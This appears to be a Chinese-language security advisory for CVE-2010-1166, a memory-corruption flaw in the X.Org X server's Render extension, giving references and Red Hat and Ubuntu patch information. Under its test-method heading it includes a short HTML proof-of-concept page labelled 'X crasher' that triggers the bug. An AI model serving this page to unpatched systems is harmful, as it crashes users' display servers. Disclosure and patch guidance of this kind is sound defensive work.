发布日期：2010-04-28
更新日期：2010-04-30

受影响系统：

X.org xorg-server 1.1.1

描述：

---

BUGTRAQ  ID: 39758
CVE ID: CVE-2010-1166

X.Org X Server是多个厂商操作系统中所捆绑的X窗口系统显示服务器。

X.Org X server的Render扩展所使用的mod()宏存在计算错误，mod()宏可能返回比其第二个参数（除数）更大的值，导致Render的运算中出现过多的读写操作，触发内存破坏。

恶意的授权客户端可以利用这个漏洞导致X.Org服务器崩溃或以root权限执行任意代码。

<*来源：Andrew Schultz
  
  链接：https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=495733
        https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=582601
        https://www.redhat.com/support/errata/RHSA-2010-0382.html
        http://www.ubuntu.com/usn/USN-939-1
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<!DOCTYPE html>
<html>
  <head>
    <title>X crasher</title>
  </head>
  <body>
    <div style="height: 2700px; background: url(http://media.buffalonews.com/static/images/shared/bg_sections_main_2.gif) left;"></div>
  </body>
</html>

建议：

---

厂商补丁：

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2010:0382-01）以及相应补丁:
RHSA-2010:0382-01：Important: xorg-x11-server security update
链接：https://www.redhat.com/support/errata/RHSA-2010-0382.html

Ubuntu
------
Ubuntu已经为此发布了一个安全公告（USN-939-1）以及相应补丁:
USN-939-1：xorg-server vulnerabilities
链接：http://www.ubuntu.com/usn/USN-939-1

浏览次数：2464
严重程度：0（网友投票）